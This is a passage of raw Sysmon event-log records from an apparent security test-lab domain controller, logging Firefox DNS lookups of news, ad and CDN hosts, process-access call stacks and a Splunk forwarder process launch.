Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21 10341000x800000000000000018026Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:46.348{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x800000000000000018025Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.920{59A5CD1D-945A-6005-3305-00000000A301}7052d1azc1qln24ryf.cloudfront.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018024Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.914{59A5CD1D-945A-6005-3305-00000000A301}7052d1azc1qln24ryf.cloudfront.net013.35.253.166;13.35.253.98;13.35.253.114;13.35.253.163;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018023Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.913{59A5CD1D-945A-6005-3305-00000000A301}7052d1azc1qln24ryf.cloudfront.net0::ffff:13.35.253.163;::ffff:13.35.253.166;::ffff:13.35.253.98;::ffff:13.35.253.114;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018022Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.819{59A5CD1D-945A-6005-3305-00000000A301}7052logs1408.xiti.com9501-C:\Program Files\Mozilla Firefox\firefox.exe 
22542200x800000000000000018021Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.816{59A5CD1D-945A-6005-3305-00000000A301}7052logs1408.xiti.com034.247.35.215;34.247.250.37;34.248.190.151;54.76.85.106;54.220.130.183;54.229.171.135;63.35.67.147;18.202.169.182;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018020Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.815{59A5CD1D-945A-6005-3305-00000000A301}7052logs1408.xiti.com0::ffff:18.202.169.182;::ffff:34.247.35.215;::ffff:34.247.250.37;::ffff:34.248.190.151;::ffff:54.76.85.106;::ffff:54.220.130.183;::ffff:54.229.171.135;::ffff:63.35.67.147;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018019Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.730{59A5CD1D-945A-6005-3305-00000000A301}7052e4638.d.akamaiedge.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018018Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.727{59A5CD1D-945A-6005-3305-00000000A301}7052e4638.d.akamaiedge.net0104.84.100.163;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018017Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.726{59A5CD1D-945A-6005-3305-00000000A301}7052tag.aticdn.net0type: 5 tag.aticdn.net.edgekey.net;type: 5 e4638.d.akamaiedge.net;::ffff:104.84.100.163;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018016Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.722{59A5CD1D-945A-6005-3305-00000000A301}7052renderer.apester.com9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018015Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.709{59A5CD1D-945A-6005-3305-00000000A301}7052renderer.apester.com035.186.220.219;C:\Program Files\Mozilla Firefox\firefox.exe 
22542200x800000000000000018014Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.708{59A5CD1D-945A-6005-3305-00000000A301}7052renderer.apester.com0::ffff:35.186.220.219;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018013Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.663{59A5CD1D-945A-6005-3305-00000000A301}7052pki-goog.l.google.com02a00:1450:4001:808::2003;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018012Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.644{59A5CD1D-945A-6005-3305-00000000A301}7052storage.googleapis.com02a00:1450:4001:806::2010;2a00:1450:4001:818::2010;2a00:1450:4001:81a::2010;2a00:1450:4001:825::2010;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018011Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.642{59A5CD1D-945A-6005-3305-00000000A301}7052storage.googleapis.com0216.58.212.144;216.58.212.176;142.250.74.208;172.217.16.144;172.217.18.112;172.217.21.208;172.217.21.240;172.217.22.48;172.217.22.80;172.217.22.112;172.217.23.176;216.58.205.240;216.58.207.80;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018010Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.642{59A5CD1D-945A-6005-3305-00000000A301}7052storage.googleapis.com0::ffff:216.58.207.80;::ffff:216.58.212.144;::ffff:216.58.212.176;::ffff:142.250.74.208;::ffff:172.217.16.144;::ffff:172.217.18.112;::ffff:172.217.21.208;::ffff:172.217.21.240;::ffff:172.217.22.48;::ffff:172.217.22.80;::ffff:172.217.22.112;::ffff:172.217.23.176;::ffff:216.58.205.240;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018009Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:00:45.635{59A5CD1D-945A-6005-3305-00000000A301}7052d2ceu0qq55wtf6.cloudfront.net02600:9000:2057:8600:1a:2bb5:7c80:93a1;2600:9000:2057:9000:1a:2bb5:7c80:93a1;2600:9000:2057:c000:1a:2bb5:7c80:93a1;2600:9000:2057:ce00:1a:2bb5:7c80:93a1;2600:9000:2057:d400:1a:2bb5:7c80:93a1;2600:9000:2057:ec00:1a:2bb5:7c80:93a1;2600:9000:2057:4200:1a:2bb5:7c80:93a1;2600:9000:2057:7c00:1a:2bb5:7c80:93a1;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018008Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.631{59A5CD1D-945A-6005-3305-00000000A301}7052d2ceu0qq55wtf6.cloudfront.net099.86.7.45;99.86.7.64;99.86.7.97;99.86.7.113;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018007Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.630{59A5CD1D-945A-6005-3305-00000000A301}7052secure-media.kicker.de0type: 5 d2ceu0qq55wtf6.cloudfront.net;::ffff:99.86.7.113;::ffff:99.86.7.45;::ffff:99.86.7.64;::ffff:99.86.7.97;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018006Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.422{59A5CD1D-8E56-6005-2E00-00000000A301}246445.175.181.195.in-addr.arpa.0type: 12 frankfurt-44.cdn77.com;C:\Windows\sysmon64.exe 22542200x800000000000000018005Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.422{59A5CD1D-8E56-6005-2E00-00000000A301}246453.72.190.35.in-addr.arpa.0type: 12 53.72.190.35.bc.googleusercontent.com;C:\Windows\sysmon64.exe 22542200x800000000000000018004Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.414{59A5CD1D-8E56-6005-2E00-00000000A301}246429.7.86.99.in-addr.arpa.0type: 12 server-99-86-7-29.fra6.r.cloudfront.net;C:\Windows\sysmon64.exe 22542200x800000000000000018003Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:00:45.414{59A5CD1D-8E56-6005-2E00-00000000A301}246484.177.222.52.in-addr.arpa.0type: 12 server-52-222-177-84.ham50.r.cloudfront.net;C:\Windows\sysmon64.exe 22542200x800000000000000018002Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.414{59A5CD1D-8E56-6005-2E00-00000000A301}2464104.156.227.13.in-addr.arpa.0type: 12 server-13-227-156-104.muc51.r.cloudfront.net;C:\Windows\sysmon64.exe 22542200x800000000000000018001Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.412{59A5CD1D-8E56-6005-2E00-00000000A301}2464126.215.204.143.in-addr.arpa.0type: 12 server-143-204-215-126.fra53.r.cloudfront.net;C:\Windows\sysmon64.exe 22542200x800000000000000018000Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.412{59A5CD1D-8E56-6005-2E00-00000000A301}246474.98.230.87.in-addr.arpa.0type: 12 ma5037422.psmanaged.com;C:\Windows\sysmon64.exe 22542200x800000000000000017999Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.262{59A5CD1D-945A-6005-3305-00000000A301}7052events.apester.com9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017998Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.246{59A5CD1D-945A-6005-3305-00000000A301}7052events.apester.com035.190.63.234;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017997Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.245{59A5CD1D-945A-6005-3305-00000000A301}7052events.apester.com0::ffff:35.190.63.234;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017996Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.233{59A5CD1D-945A-6005-3305-00000000A301}7052t2.shared.global.fastly.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017995Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:00:45.229{59A5CD1D-945A-6005-3305-00000000A301}7052t2.shared.global.fastly.net0151.101.14.217;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017994Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.229{59A5CD1D-945A-6005-3305-00000000A301}7052display.apester.com0type: 5 t2.shared.global.fastly.net;::ffff:151.101.14.217;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017993Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.019{59A5CD1D-945A-6005-3305-00000000A301}7052lbnew.consentmanager.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017992Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.017{59A5CD1D-945A-6005-3305-00000000A301}7052lbnew.consentmanager.net087.230.98.74;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017991Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.016{59A5CD1D-945A-6005-3305-00000000A301}7052consentmanager.mgr.consensu.org0type: 5 lbnew.consentmanager.net;::ffff:87.230.98.74;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017990Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:44.840{59A5CD1D-945A-6005-3305-00000000A301}7052d37wlqo0pgd5lo.cloudfront.net02600:9000:21a1:9200:e:785c:6700:93a1;2600:9000:21a1:de00:e:785c:6700:93a1;2600:9000:21a1:e000:e:785c:6700:93a1;2600:9000:21a1:e600:e:785c:6700:93a1;2600:9000:21a1:2600:e:785c:6700:93a1;2600:9000:21a1:3a00:e:785c:6700:93a1;2600:9000:21a1:5a00:e:785c:6700:93a1;2600:9000:21a1:6600:e:785c:6700:93a1;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017989Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:44.839{59A5CD1D-945A-6005-3305-00000000A301}7052static.apester.com9501-C:\Program Files\Mozilla Firefox\firefox.exe 
22542200x800000000000000017988Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:44.835{59A5CD1D-945A-6005-3305-00000000A301}7052d37wlqo0pgd5lo.cloudfront.net013.227.156.58;13.227.156.65;13.227.156.80;13.227.156.104;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017987Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:44.834{59A5CD1D-945A-6005-3305-00000000A301}7052a1887.dscq.akamai.net02a02:26f0:eb::214:bd5a;2a02:26f0:eb::214:bd82;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017986Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:44.834{59A5CD1D-945A-6005-3305-00000000A301}7052votingrelaunch.kicker.de0type: 5 d37wlqo0pgd5lo.cloudfront.net;::ffff:13.227.156.104;::ffff:13.227.156.58;::ffff:13.227.156.65;::ffff:13.227.156.80;C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000017985Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:46.316{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017984Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:46.300{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-948E-6005-4105-00000000A301}3804C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017983Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:46.297{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017982Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:00:46.297{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017981Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:46.297{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017980Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:00:46.297{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017979Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:46.297{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-948E-6005-4105-00000000A301}3804C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000017978Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:46.297{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-948E-6005-4105-00000000A301}3804C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000017977Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:46.151{59A5CD1D-948E-6005-4105-00000000A301}3804C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000017976Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:46.289{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla 
Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017975Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:46.252{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017974Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:46.217{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program 
Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017973Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:46.217{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 22542200x800000000000000018044Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
